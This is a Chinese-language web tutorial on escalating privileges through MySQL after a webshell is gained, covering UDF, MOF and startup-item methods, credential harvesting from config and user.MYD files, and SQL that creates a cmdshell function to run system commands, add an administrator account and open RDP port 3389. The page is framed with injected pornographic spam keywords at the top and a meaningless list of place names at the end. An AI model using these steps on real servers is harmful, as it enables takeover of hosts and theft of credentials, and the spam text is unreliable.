最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

mysql數(shù)據(jù)庫(kù)提權(quán)的三種方法

 更新時(shí)間:2024年09月19日 10:22:10   作者:feing.  
文介紹了MySQL數(shù)據(jù)庫(kù)的三種提權(quán)方法:UDF提權(quán)、MOF提權(quán)和啟動(dòng)項(xiàng)提權(quán),同時(shí)列出了一些常見(jiàn)數(shù)據(jù)庫(kù)及其默認(rèn)端口,下面就來(lái)介紹一下,感興趣的可以了解一下

MySql提權(quán)的三種方式:

  • udf提權(quán)
  • mof提權(quán)
  • 啟動(dòng)項(xiàng)提權(quán)

以下是一些常見(jiàn)的數(shù)據(jù)庫(kù)及其默認(rèn)端口:

1. MySQL: 默認(rèn)端口為 3306

2. PostgreSQL: 默認(rèn)端口為 5432

3. Oracle Database: 默認(rèn)端口為 1521

4. Microsoft SQL Server: 默認(rèn)端口為 1433

5. MongoDB: 默認(rèn)端口為 27017

6. Redis: 默認(rèn)端口為 6379

7. Elasticsearch: 默認(rèn)端口為 9200 (HTTP) 和 9300 (內(nèi)部通信)

8. Cassandra: 默認(rèn)端口為 9042

9. SQLite: 通常是本地文件系統(tǒng),沒(méi)有固定端口

10. DB2: 默認(rèn)端口為 50000

11.國(guó)產(chǎn)的DM達(dá)夢(mèng)數(shù)據(jù)庫(kù), 默認(rèn)端口號(hào)為:5236;

mysql_UDF 提權(quán):

拿到webshell之后,進(jìn)行數(shù)據(jù)庫(kù)提權(quán)操作

一、端口掃描

二、信息收集:

如何獲取mysql賬號(hào)密碼

1.查看網(wǎng)站配置文件。

如:conn、config、data、sql、common 、inc、include等。

2.Mysql配置文件:C:\phpStudy\MySQL\data\mysql\user.MYD

例如:DVWA默認(rèn)數(shù)據(jù)庫(kù)存儲(chǔ)在:C:/phpStudy/WWW/DVWA/config/config.inc.php.dist目錄

點(diǎn)擊查看:賬號(hào):root 密碼:root

查看數(shù)據(jù)庫(kù)安裝路徑下的mysql文件 安裝目錄為/data/mysql/user.myd和user.myi

放到MD5在線網(wǎng)站進(jìn)行解密

三、提權(quán)利用

注意事項(xiàng):提權(quán)的第一步要知道數(shù)據(jù)庫(kù)的版本號(hào):

(1)如果mysql<5.1    導(dǎo)出目錄 c:\windows 或  c:\windows\system32

(2)mysql=>5.1   導(dǎo)出安裝目錄\MySQL\lib\plugin

注*:默認(rèn)mysql不能遠(yuǎn)程連接,需要用菜刀進(jìn)行本地連接

選擇mysql,填寫(xiě)好賬號(hào):root 密碼root,確認(rèn)好提交進(jìn)行連接

設(shè)置遠(yuǎn)程連接,用于在本地連接。

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges; 重新加載權(quán)限數(shù)據(jù)

數(shù)據(jù)庫(kù)版本為5.5.53

由于本次實(shí)驗(yàn)數(shù)據(jù)庫(kù)為5.5.53,因此選擇\MySQL\lib\plugin目錄。

提示報(bào)錯(cuò)

前提條件為:secure_file_priv等于空,需要在my.ini配置文件中進(jìn)行設(shè)置

修改之后,查看安裝dll文件完成。

創(chuàng)建cmdshell函數(shù),執(zhí)行操作系統(tǒng)命令。

Create Function cmdshell returns string soname 'udf.dll';

使用cmdshll函數(shù)執(zhí)行操作系統(tǒng)命令

select cmdshell('whoami');
select cmdshell('net user 123 123/add');    添加用戶(hù)
select cmdshell('net localgroup administrators 123 /add');    將123用戶(hù)添加到管理組

開(kāi)3389進(jìn)行遠(yuǎn)程連接

Create Function open3389 returns string soname 'udf.dll';
select open3389();    開(kāi)啟3389遠(yuǎn)程連接

注意:僅用于技術(shù)討論,切勿用于其他用途,一切后果與本人無(wú)關(guān)。

到此這篇關(guān)于mysql數(shù)據(jù)庫(kù)提權(quán)的三種方法的文章就介紹到這了,更多相關(guān)mysql數(shù)據(jù)庫(kù)提權(quán)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • MySQL主從同步診斷show?slave?status?卡住的深度排查與解決方案(最新推薦)

    MySQL主從同步診斷show?slave?status?卡住的深度排查與解決方案(最新推薦)

    在?MySQL主從架構(gòu)的日常運(yùn)維中,show?slave?status是監(jiān)控同步狀態(tài)的核心命令,本文結(jié)合源碼分析與調(diào)試實(shí)踐,揭示其背后的鎖競(jìng)爭(zhēng)機(jī)制,并提供系統(tǒng)性的排查與優(yōu)化方案,感興趣的朋友一起看看吧
    2025-06-06
  • MySQL字符集utf8修改為utf8mb4的方法步驟

    MySQL字符集utf8修改為utf8mb4的方法步驟

    這篇文章主要給大家介紹了關(guān)于MySQL字符集utf8修改為utf8mb4的方法步驟,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用MySQL具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-07-07
  • 詳解Mysql日期格式并聚合統(tǒng)計(jì)示例

    詳解Mysql日期格式并聚合統(tǒng)計(jì)示例

    這篇文章主要為大家介紹了Mysql日期格式并聚合統(tǒng)計(jì)示例詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2023-04-04
  • 解決mysql 1040錯(cuò)誤Too many connections的方法

    解決mysql 1040錯(cuò)誤Too many connections的方法

    因?yàn)槟愕膍ysql安裝目錄下的my.ini中設(shè)定的并發(fā)連接數(shù)太少或者系統(tǒng)繁忙導(dǎo)致連接數(shù)被占滿
    2012-09-09
  • MySQL數(shù)據(jù)表分區(qū)技術(shù)PARTITION詳解

    MySQL數(shù)據(jù)表分區(qū)技術(shù)PARTITION詳解

    在處理大規(guī)模數(shù)據(jù)時(shí),數(shù)據(jù)庫(kù)性能的優(yōu)化變得尤為重要,MySQL提供了一種稱(chēng)為“分區(qū)”(Partitioning)的技術(shù),可以顯著提高查詢(xún)效率和管理大型數(shù)據(jù)庫(kù)表的能力,本文將詳細(xì)介紹MySQL中的數(shù)據(jù)表分區(qū)技術(shù),包括其基本概念、類(lèi)型以及如何實(shí)現(xiàn)和維護(hù),需要的朋友可以參考下
    2025-02-02
  • MySQL中空值和NULL的區(qū)別小結(jié)

    MySQL中空值和NULL的區(qū)別小結(jié)

    在 MySQL 中,NULL 值和空值是兩個(gè)不同的概念,本文主要介紹了MySQL中空值和NULL的區(qū)別小結(jié),具有一定的參考價(jià)值,感興趣的可以了解一下
    2024-08-08
  • MySQL死鎖的產(chǎn)生原因以及解決方案

    MySQL死鎖的產(chǎn)生原因以及解決方案

    這篇文章主要介紹了MySQL死鎖的產(chǎn)生原因以及解決方案,幫助大家更好的維護(hù)數(shù)據(jù)庫(kù),感興趣的朋友可以了解下
    2020-09-09
  • gearman + mysql方式實(shí)現(xiàn)持久化操作示例

    gearman + mysql方式實(shí)現(xiàn)持久化操作示例

    這篇文章主要介紹了gearman + mysql方式實(shí)現(xiàn)持久化操作,簡(jiǎn)單描述了持久化的概念、原理,并結(jié)合實(shí)例形式分析了gearman + mysql持久化操作相關(guān)實(shí)現(xiàn)技巧,需要的朋友可以參考下
    2020-02-02
  • Ubuntu下啟動(dòng)、停止、重啟MySQL,查看錯(cuò)誤日志命令大全

    Ubuntu下啟動(dòng)、停止、重啟MySQL,查看錯(cuò)誤日志命令大全

    這篇文章主要介紹了Ubuntu下啟動(dòng)、停止、重啟MySQL,查看錯(cuò)誤日志命令大全,需要的朋友可以參考下
    2014-06-06
  • mysql實(shí)現(xiàn)多表關(guān)聯(lián)統(tǒng)計(jì)(子查詢(xún)統(tǒng)計(jì))示例

    mysql實(shí)現(xiàn)多表關(guān)聯(lián)統(tǒng)計(jì)(子查詢(xún)統(tǒng)計(jì))示例

    這篇文章主要介紹了mysql實(shí)現(xiàn)多表關(guān)聯(lián)統(tǒng)計(jì)(子查詢(xún)統(tǒng)計(jì)),結(jié)合具體案例形式分析了mysql多表關(guān)聯(lián)統(tǒng)計(jì)的原理、實(shí)現(xiàn)方法及相關(guān)操作注意事項(xiàng),需要的朋友可以參考下
    2019-10-10

最新評(píng)論

阿拉善右旗| 杭锦后旗| 项城市| 姚安县| 高阳县| 昌图县| 丰镇市| 金川县| 武义县| 赤壁市| 昌黎县| 城市| 黄冈市| 扎鲁特旗| 定襄县| 荆州市| 高碑店市| 自治县| 文水县| 芮城县| 镇平县| 丁青县| 丹东市| 宝鸡市| 阳高县| 盐津县| 且末县| 石景山区| 庄河市| 贵定县| 琼海市| 册亨县| 沐川县| 渑池县| 宁蒗| 陇川县| 巨野县| 荥阳市| 申扎县| 长沙县| 射阳县|